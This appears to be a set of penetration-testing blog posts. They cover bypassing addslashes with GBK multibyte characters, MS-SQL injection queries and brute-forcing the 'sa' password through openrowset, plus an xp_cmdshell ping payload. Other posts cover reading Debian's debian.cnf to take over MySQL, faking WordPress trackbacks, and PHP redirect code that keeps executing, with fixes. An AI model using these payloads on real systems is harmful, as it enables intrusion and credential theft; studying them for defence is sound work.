www.notsosecure.com

Query:- There is a web application vulnerable to SQL Injection, but the web server has added protection like magic_quotes or the application calls the function add_slashes, which means i can't insert  a single quote and thus cant exploit a SQL Injection. The injection point is in a string field. Does it means, its safe??????

Answer:- To the best of my knowledge, it is safe if your application supports utf-8 encoding(which is most common). However, if it supports utf-7 encoding, it becomes vulnerable. This is best described by Chris Shifflett:-

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

"In GBK, 0xbf27 is not a valid multi-byte character, but 0xbf5c is. Interpreted as single-byte characters, 0xbf27 is 0xbf (¿) followed by 0×27 ('), and 0xbf5c is 0xbf (¿) followed by 0×5c (\).

How does this help? If I want to attempt an SQL injection attack against a MySQL database, having single quotes escaped with a backslash is a bummer. If you're using addslashes(), however, I'm in luck. All I need to do is inject something like 0xbf27, and addslashes() modifies this to become 0xbf5c27, a valid multi-byte character followed by a single quote. In other words, I can successfully inject a single quote despite your escaping. That's because 0xbf5c is interpreted as a single character, not two. Oops, there goes the backslash."

Well Done Chris..

Some information about MS-SQL server. You may find this info useful for exploiting SQL injection:

Finding Table Names:
Donot use:- Select name from sysobjects where xtype=’U’
Use:- SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_schema = ‘db_name’]
[WHERE|AND table_name LIKE ‘wild’]
The first query will only return the table names which belong to current databases, however, the second query will return the the table names from other databases as well to which the current user has access to.

Getting Current User
Use:-Select SYSTEM_USER
Someone pointed this out that Select user will return the owner of the current database which may differ from the current user. So, system-user is alwayas correct to use.

Brute Forcing ’sa’ User’s Password
Use openrowset:-select null from openrowset(’sqloledb’,”;’sa’;'[password]’,’select 1;waitfor delay ”0:0:10” ‘)

When the password supplied is correct the query ’select 1;waitfor delay ”0:0:10” ‘ will get executed. As i write this blog, i am just wondering if we can execute something like this:

select null from openrowset(’sqloledb’,”;’sa’;'[password]’,'exec master..xp_cmshell ”ping my_host”’). I will confirm this sometime later.

i recently updated my MySql server and i am currently using the version.5.0.38-Debian_1-log If you ever wondered how MySql saves data on your hard disk, then this is best explained here. I will quote from the same website

“Each database is a directory, with each table stored in a separate set of files. For an individual table, the .frm file contains information about the table structure — effectively, an internal representation of the CREATE TABLE statement. The .MYD file contains the row data, and the .MYI contains any indexes belonging with this table, as well as some statistics about the table. The data file contains only row data, with minimal overhead.”

Thus if you can read these directories/files, you can get hold of the database/table names respectively.
ISSUE-1
I looked on my debian box and these files are located in /var/lib/mysql folder. This folder is owned by user mysql and belongs to group mysql. Surprisingly, by default the permissions on this folder is 755. Thus a normal user on the box can list files and directories in the folder /var/lib/mysql and get hold of all the database names,which the MySQL server stores on this host
. However, the database directories in this folder are properly locked which denies an unprivlidged user to get tables information for databases. Although, the database mysql itslef allows directory listing but the files are not word readable. Thus a normal user cant read the file /var/lib/mysql/mysql/user.MYD which represent the table mysql.user and stores mysql username and encrypted password.

ISSUE-2.0
If you are able to find a local privelege escalation on a box and manage to get root access, how will you get hold of the data stored in the MySql database?
You will probably try to read the file /var/lib/mysql/mysql/user.MYD to get the Mysql Username and their password hash and would then try to crack these hashes. It then comes down to the complexity of the password and if the password is complex enough there are chances that you may still not be able to crack it. However, the story is a bit different if you are on a debian box. Debian has an inbuilt account debian-sys-maint which bydefault has privilieges equivalent to what you will have for root user. To make matter worse, the file /etc/mysql/debian.cnf contains the randomly generated clear text password for this user. However, this file is again not word readable. But if you got a privilege escalation on debian box, no need to crack the hashes, just issue the command: mysql –defaults-extra-file=/etc/mysql/debian.cnf and you will have the entire MySql server to play.

I was researching a bit into the wordpress trackback utility. This is how it works:
You submit a post with trackback urls, and when you publish the post, the wordpress sends out a request to the URL you mentioned in the trackback URLs. Essentially this happens in the background.

You—–> Wordpress Server———->Trackback URL

The trackback request to the trackback URL is not made by your browser, but the request will be sent by your server hosting wordpress application. This was a bit surprising to me, as what if my wordpress hosting company does not allow outbound traffic? Anyways the request is nothing special , its a straight forward post request to the trackback URL with the following parameters.

title
url
blog_name
excerpt.

I wrote a simple perl script which you can use to send fake trackback request. Although the request will go from your IP address, (unless you use some anonymous proxy) You can specify the Fake Url and other parameters which will appear to the victim’s wordpress. The Only solution i can think to avoid getting fake trackbacks is by having a check on the submitted url to see if it resolves to the same ip address. However, that might create some other problems.

However, I would be more interested in knowing if we can abuse it still further. At the moment i cant think of any more attack vectors to exploit this. As the connection to the trackback URL is made by wordpress server, can we not make it connect to a malicious host. Can we not make it connect to different ports on different hosts… blah.. blah blah... I look forward to hearing comments on this. BTW this blog is not just about hacking wordpress:)

While testing a web application today, i noticed an unusual 302 HTTP response. Normally a 302 response just has a header and no html code, becuase its meant to be redirecting you to the page cited in the ‘Location’ field of the http header.� The 302 response had the html code which will be presented to the authenticated admin user, but, we didnt have the admin credentials. So, how are we seeing this code. After analyzing the 302 redircect response, we concluded that this was the result of insecure coding. The following example explains this issue in php.

insecure code:

<?
session_start();
include (”../config.php”);
echo $loggedin;

if ($loggedin != “1″){
header(”Location: http://www.google.com”); /* Redirect browser */

}

{
echo “Will this code Get executed?”;
}?>

In this example the code echo “Will this code Get executed?”; will indeed gets executed irrespective of the value of $loggedin. This is characteristics of php, and you wont see this behaviour in asp .net. To secure this code, follow this:

<?
session_start();
include (”../config.php”);
echo $loggedin;

if ($loggedin != “1″){
header(”Location: http://www.google.com”); /* Redirect browser */

}
else
{
echo “Will this code Get executed?”;
}?>

Alternatively, this code can be secured by:

<?
session_start();
include (”../config.php”);
echo $loggedin;

if ($loggedin != “1″){
header(”Location: http://www.google.com”); /* Redirect browser */
die;
}

{
echo “Will this code Get executed?”;
}?>

It is very easy for a pentester to miss out this issue, becuase in most of the cases you get redirected so fast then this page is not rendered by your browser. Unless you go through each 302 request manually, i dont think you will be able to spot it. In this case, even webinspect wasnt able to spot it.